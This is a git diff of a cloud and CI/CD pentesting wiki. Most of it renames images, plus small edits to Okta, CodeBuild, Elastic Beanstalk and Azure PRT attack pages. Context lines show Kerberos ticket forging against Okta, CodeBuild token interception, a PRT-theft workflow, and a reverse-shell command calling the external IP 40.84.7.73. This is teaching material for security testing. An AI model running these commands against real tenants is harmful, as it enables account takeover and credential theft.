diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png new file mode 100644 index 0000000000..d7961cab39 Binary files /dev/null and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png index d7961cab39..ece9585b82 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png index ece9585b82..3048b65efa 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png index 3048b65efa..fb52dbc6cd 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png index fb52dbc6cd..ce50798209 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png index ce50798209..fb5aa4f77c 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png index fb5aa4f77c..0f269bd025 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1).png index 0f269bd025..66bce84492 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1).png index 66bce84492..cf55c03e28 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1).png index cf55c03e28..7e59066fb8 100644 Binary files a/.gitbook/assets/image (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1).png b/.gitbook/assets/image (1) (1).png index 7e59066fb8..a66b921a15 100644 Binary files a/.gitbook/assets/image (1) (1).png and b/.gitbook/assets/image (1) (1).png differ diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png index a66b921a15..6e6b14ecd4 100644 Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png new file mode 100644 index 0000000000..1520310fb4 Binary files /dev/null and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png index 1520310fb4..d02adb1bc2 100644 Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png index d02adb1bc2..2c1380cee8 100644 Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png index 2c1380cee8..d0ab10ede3 100644 Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1).png index d0ab10ede3..6c458d0381 100644 Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1).png index 6c458d0381..feea4d9138 100644 Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (2) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1).png index feea4d9138..b57f12f1b5 100644 Binary files a/.gitbook/assets/image (2) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (2) (1) (1).png b/.gitbook/assets/image (2) (1) (1).png index b57f12f1b5..f282f52114 100644 Binary files a/.gitbook/assets/image (2) (1) (1).png and b/.gitbook/assets/image (2) (1) (1).png differ diff --git a/.gitbook/assets/image (2) (1).png b/.gitbook/assets/image (2) (1).png index f282f52114..0c13369f3d 100644 Binary files a/.gitbook/assets/image (2) (1).png and b/.gitbook/assets/image (2) (1).png differ diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png index 0c13369f3d..4ba6ea2ef1 100644 Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png new file mode 100644 index 0000000000..79ded4931f Binary files /dev/null and b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png index 79ded4931f..c31faa50d4 100644 Binary files a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1) (1).png index c31faa50d4..f2584b8ffc 100644 Binary files a/.gitbook/assets/image (3) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1).png index f2584b8ffc..d2bc442169 100644 Binary files a/.gitbook/assets/image (3) (1) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (3) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1).png index d2bc442169..0ea673488f 100644 Binary files a/.gitbook/assets/image (3) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (3) (1) (1).png b/.gitbook/assets/image (3) (1) (1).png index 0ea673488f..0f975e1051 100644 Binary files a/.gitbook/assets/image (3) (1) (1).png and b/.gitbook/assets/image (3) (1) (1).png differ diff --git a/.gitbook/assets/image (3) (1).png b/.gitbook/assets/image (3) (1).png index 0f975e1051..082f6e0956 100644 Binary files a/.gitbook/assets/image (3) (1).png and b/.gitbook/assets/image (3) (1).png differ diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png index 082f6e0956..654ddaa3bf 100644 Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1) (1).png new file mode 100644 index 0000000000..1a81f9de9c Binary files /dev/null and b/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1).png index 1a81f9de9c..2712b6af5f 100644 Binary files a/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1) (1).png index 2712b6af5f..ec1557dd97 100644 Binary files a/.gitbook/assets/image (4) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1).png index ec1557dd97..d68bdcd0ce 100644 Binary files a/.gitbook/assets/image (4) (1) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1).png index d68bdcd0ce..66bce84492 100644 Binary files a/.gitbook/assets/image (4) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1) (1).png b/.gitbook/assets/image (4) (1) (1).png index 66bce84492..c0aaaf701c 100644 Binary files a/.gitbook/assets/image (4) (1) (1).png and b/.gitbook/assets/image (4) (1) (1).png differ diff --git a/.gitbook/assets/image (4) (1).png b/.gitbook/assets/image (4) (1).png index c0aaaf701c..44dbbe0a5d 100644 Binary files a/.gitbook/assets/image (4) (1).png and b/.gitbook/assets/image (4) (1).png differ diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png index 44dbbe0a5d..d7321dae6c 100644 Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png index d7321dae6c..67281e0416 100644 Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ diff --git a/SUMMARY.md b/SUMMARY.md index 71b37247ed..79ee64681c 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -76,6 +76,7 @@ * [GCP - AppEngine Privesc](pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-appengine-privesc.md) * [GCP - Cloudbuild Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md) * [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) + * [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md) * [GCP - Cloudscheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) * [GCP - Compute Privesc](pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/README.md) * [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-pentesting/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md) @@ -115,7 +116,7 @@ * [GCP - SQL Enum](pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-sql-enum.md) * [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md) * [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md) - * [GCP - IAM, Ppals & Org Policies Enum](pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md) + * [GCP - IAM, Principals & Org Policies Enum](pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md) * [GCP - KMS Manager Enum](pentesting-cloud/gcp-security/gcp-services/gcp-kms-and-secrets-management-enum.md) * [GCP - Pub/Sub](pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md) * [GCP - Secrets Manager Enum](pentesting-cloud/gcp-pentesting/gcp-services/gcp-secrets-manager-enum.md) diff --git a/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/pentesting-ci-cd/gitea-security/basic-gitea-information.md index efe34c6fde..2f66524b09 100644 --- a/pentesting-ci-cd/gitea-security/basic-gitea-information.md +++ b/pentesting-ci-cd/gitea-security/basic-gitea-information.md @@ -46,7 +46,7 @@ When creating a new team, several important settings are selected: * **Administrator** access * **Specific** access: -![](<../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png>) +![](<../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png>) ### Teams & Users diff --git a/pentesting-ci-cd/okta-security/README.md b/pentesting-ci-cd/okta-security/README.md index 646cc1437f..a53661c1f8 100644 --- a/pentesting-ci-cd/okta-security/README.md +++ b/pentesting-ci-cd/okta-security/README.md @@ -64,11 +64,11 @@ getST.py -spn HTTP/clientname.kerberos.okta.com -dc-ip 1.2.3.4 LAB/comprommisedu With a ticket retrieved for the AD user, we need to inject this on a host we control using Rubeus or Mimikatz: -
+
You’ll need to make sure that `clientname.kerberos.okta.com` is added to the “Intranet” security zone in Internet Options. And then, in our browser, if we hit the below URL, we should find that we receive a JSON response providing an `OK` result when the Kerberos ticket is accepted: -
+
Heading over to the Okta dashboard, if everything is OK, you’ll be signed in. @@ -76,7 +76,7 @@ Moreover, if we are able to compromise the actual Okta service account exposing It should be noted that as Okta only support AES for ticket encryption, we’ll need to ensure we have the AES key or plaintext password to authenticate: -
+
To craft our ticket for the victim user of `testuser`, we use: @@ -88,7 +88,7 @@ ticketer.py -domain-sid S-1-5-21-4170871944-1575468979-147100471 -domain lab.loc And again, deliver this to Okta via our browser session: -
+
### Hijacking Okta AD Agent @@ -104,7 +104,7 @@ C:\Program Files (x86)\Okta\Okta AD Agent We’re going to take a look at the `OktaAgentService.exe.config`, which contains a few interesting bits of XML: -
+
The Base64 encoded `AgentToken` is where we set our sights. If we open up `OktaAgentService.exe` in dnSpy, we can see how these values are decrypted: diff --git a/pentesting-ci-cd/travisci-security/README.md b/pentesting-ci-cd/travisci-security/README.md index 7534776b27..de4eecbc8f 100644 --- a/pentesting-ci-cd/travisci-security/README.md +++ b/pentesting-ci-cd/travisci-security/README.md @@ -44,7 +44,7 @@ It looks like It's not possible to set crons inside the `.travis.yml` according TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets: -![](<../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) +![](<../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) ### Dumping Secrets diff --git a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md index 949e6ee757..40c738154b 100644 --- a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md +++ b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md @@ -35,22 +35,24 @@ The Docker image you could use is [https://github.com/carlospolop/docker-mitm](h * **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint. * You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host * Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...) -2. **Set the environment** +2. **Set the environment** + * Create a **new Codebuild project** or **modify** the environment of an existing one. + * Set the project to use the **previously generated Docker image** - * Create a **new Codebuild project** or **modify** the environment of an existing one. - * Set the project to use the **previously generated Docker image** - * +
- ``` -
- ``` 3. **Set the MitM proxy in your host** - * As indicated in the **Github repo** you could use something like: + +* As indicated in the **Github repo** you could use something like: ```bash mitmproxy --listen-port 4444 --allow-hosts "github.com" ``` +{% hint style="success" %} +The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work. +{% endhint %} + 4. **Run the build & capture the credentials** * You can see the token in the **Authorization** header: diff --git a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-kms-post-exploitation.md b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-kms-post-exploitation.md index 479612c01c..1e70287367 100644 --- a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-kms-post-exploitation.md +++ b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-kms-post-exploitation.md @@ -106,7 +106,7 @@ aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \ Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**. {% endhint %} -
+
### Destroy keys diff --git a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-s3-post-exploitation.md b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-s3-post-exploitation.md index d2c063c9d6..7aa9f6d376 100644 --- a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-s3-post-exploitation.md +++ b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-s3-post-exploitation.md @@ -42,7 +42,7 @@ For example, **airflow** could be storing **DAGs** **code** in there, or **web p The following screenshot shows an example of a file that was targeted for a ransomware attack. As you can see, the account ID that owns the KMS key that was used to encrypt the object (7\*\*\*\*\*\*\*\*\*\*2) is different than the account ID of the account that owns the object (2\*\*\*\*\*\*\*\*\*\*1). -![](<../../../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png>) +![](<../../../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) Here you can [find a ransomware example](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/s3\_ransomware/s3-ransomware-poc.py) that does the following: diff --git a/pentesting-cloud/aws-pentesting/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md b/pentesting-cloud/aws-pentesting/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md index 6c537df0fd..7f1382550e 100644 --- a/pentesting-cloud/aws-pentesting/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md +++ b/pentesting-cloud/aws-pentesting/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md @@ -43,11 +43,11 @@ zip 1692777270420-aws-flask-app.zip # Upload code aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip # Rebuild env -aws elasticbeanstalk rebuild-environment --environment-id "env-id" +aws elasticbeanstalk rebuild-environment --environment-name "env-name" ``` {% endcode %} -### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, and more... +### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, and more... The mentioned plus several **`S3`**, **`EC2`, `cloudformation`** ,**`autoscaling`** and **`elasticloadbalancing`** permissions are the necessary to create a raw Elastic Beanstalk scenario from scratch. diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md index e244eb0887..dcaf2e4d5e 100644 --- a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md +++ b/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md @@ -62,7 +62,7 @@ Note that ECR requires that users have **permission** to make calls to the **`ec It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry. -
+
First, you need to give the external account access over the registry with a **registry policy** like: diff --git a/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md b/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md index 91e91edae0..7bb038abfa 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md @@ -248,7 +248,7 @@ It's possible to generate API keys in the API Gateway portal and even set how mu To make an API key work, you need to add it to a **Usage Plan**, this usage plan mus be added to the **API Stage** and the associated API stage needs to have a configured a **method throttling** to the **endpoint** requiring the API key: -
+
## Unauthenticated Access diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md index b66207fcf9..7354015a77 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md @@ -119,7 +119,7 @@ AWS Access Advisor relies on last 400 days AWS **CloudTrail logs to gather its i Therefore, Access Advisor informs about **the unnecessary permissions being given to users** so the admin could remove them {% endhint %} -
+
## Actions diff --git a/pentesting-cloud/azure-security/az-basic-information.md b/pentesting-cloud/azure-security/az-basic-information.md index 3544c112e5..4d1939805b 100644 --- a/pentesting-cloud/azure-security/az-basic-information.md +++ b/pentesting-cloud/azure-security/az-basic-information.md @@ -145,7 +145,7 @@ In Azure **permissions are can be assigned to any part of the hierarchy**. That This hierarchical structure allows for efficient and scalable management of access permissions. -
+
### Azure RBAC vs ABAC diff --git a/pentesting-cloud/azure-security/az-device-registration.md b/pentesting-cloud/azure-security/az-device-registration.md index 8b8fc0478f..8db1db142f 100644 --- a/pentesting-cloud/azure-security/az-device-registration.md +++ b/pentesting-cloud/azure-security/az-device-registration.md @@ -62,7 +62,7 @@ roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie And then you can register the device: -
+
Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**. @@ -78,7 +78,7 @@ This attack was fixed in September 2021 as you can no longer register new device It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info check this [**talk**](https://youtu.be/BduCn8cLV1A). -
+
{% hint style="danger" %} However, this was fixed. diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md index 15818d5b7d..43faff51c1 100644 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md @@ -46,19 +46,19 @@ The “upgrade” from normal refresh token to primary refresh token is not poss If there is a policy that requires MFA to sign in, we can instead use the `interactiveauth` module: -
+
The resulting refresh token (which is cached in the `.roadtools_auth` file) can be used to request a token for the device registration service, where we can create the device: -
+
Now that we have a device identity, we can combine this with the same refresh token to obtain a PRT (both refresh tokens shortened for readability): -
+
Tokens resulting from the authentication will contain the same authentication method claims as used during the registration, so **any MFA usage will be transferred to the PRT**. The PRT that we get can be used in any authentication flow, so we can expand the scope of our limited refresh token to any possible app. -
+
We can also use this to sign in to browser flows: diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md index 246bd80ed2..6c301e0ceb 100644 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md @@ -55,7 +55,7 @@ roadtx interactiveauth -u myuser@mytenant.com -p password -r devicereg Any of the commands above with **save an access token to the `.roadtools_auth` file**. The device registration command will automatically load it from this file. You can customize what you want for device properties with various commandline parameters to the `roadtx device` module: -
+
We register an Azure AD joined device with the name “blogdevice”: @@ -113,7 +113,7 @@ Tokens were written to .roadtools_auth There’s also other options you can use to specify other resources or the correct redirect URL for the app you are using: -
+
## Selenium based Azure AD authentication @@ -163,7 +163,7 @@ roadtx browserprtinject -u newlowpriv@iminyour.cloud -r msgraph -c msteams The issued access token will contain the `deviceid` claim, which is the device from which we stole the PRT. Since this device is Intune managed and compliant, it passes the compliancy requirement: -
+
### Adding MFA claims to an existing PRT @@ -182,7 +182,7 @@ roadtx prt -r -c blogdevice.pem -k blogdevice.key The new PRT is written to disk and when we use it to request tokens we see the MFA claim: -
+
We can use this PRT to obtain tokens for resources that require MFA using any of the above methods. diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md index e916d4b28b..59f639f234 100644 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md @@ -28,11 +28,11 @@ Get-MsolUser -SerachString admintest | select displayname, lastdirsynctime, prox ``` {% endcode %} -
+
When a user like these is found in AzureAD, in order to **access it from the on-prem AD** you just need to **create a new account** with the **proxyAddress** the SMTP email: -
+
An automatically, this user will be **synced from AzureAD to the on-prem AD user**. diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md index 4e872afdd8..d49836276b 100644 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md @@ -43,7 +43,7 @@ The database is located in `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync It's possible to extract the configuration from one of the tables, being one encrypted: -
+
The **encrypted configuration** is encrypted with **DPAPI** and it contains the **passwords of the `MSOL_*`** user in on-prem AD and the password of **Sync\_\*** in AzureAD. Therefore, compromising these it's possible to privesc to the AD and to AzureAD. diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md index 363285e791..31e8cd6cab 100644 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md @@ -60,7 +60,7 @@ The **KDF context is** a nonce from AzureAD and the PRT creating a **JWT** mixed Therefore, even if the PTR cannot be extracted because it's located inside the TPM, it's possible to abuseLSASS to **request derived keys from new contexts and use the generated keys to sign Cookies**. -
+
## PRT Abuse Scenarios @@ -286,7 +286,7 @@ roadtx browserprtauth roadtx describe < .roadtools_auth ``` -
+
#### Option 3 - roadrecon using derived keys diff --git a/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md b/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md index 7b317b9d86..834b107e3f 100644 --- a/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md +++ b/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md @@ -72,7 +72,7 @@ RevPShell -Reverse 40.84.7.73 443 Now we’ll run our configuration file. I have mine setup to be published to the Desktop for a better visual, however it can be published just about anywhere. After a couple of minutes, we’ll see that the reverse-shell script has been published! -
+
### Step 6 — Host Payload and Setup Listener diff --git a/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md b/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md index e0a7743a7f..44520a025f 100644 --- a/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md +++ b/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md @@ -213,7 +213,7 @@ az network vnet subnet list --resource-group --vnet-name
+
**Service Endpoints:** diff --git a/pentesting-cloud/azure-security/keyvault.md b/pentesting-cloud/azure-security/keyvault.md index 131b8f5097..4858eb97d2 100644 --- a/pentesting-cloud/azure-security/keyvault.md +++ b/pentesting-cloud/azure-security/keyvault.md @@ -45,7 +45,7 @@ A role like **Contributor** that has permissions in the management place to mana ### Key Vault RBAC Built-In Roles -
+
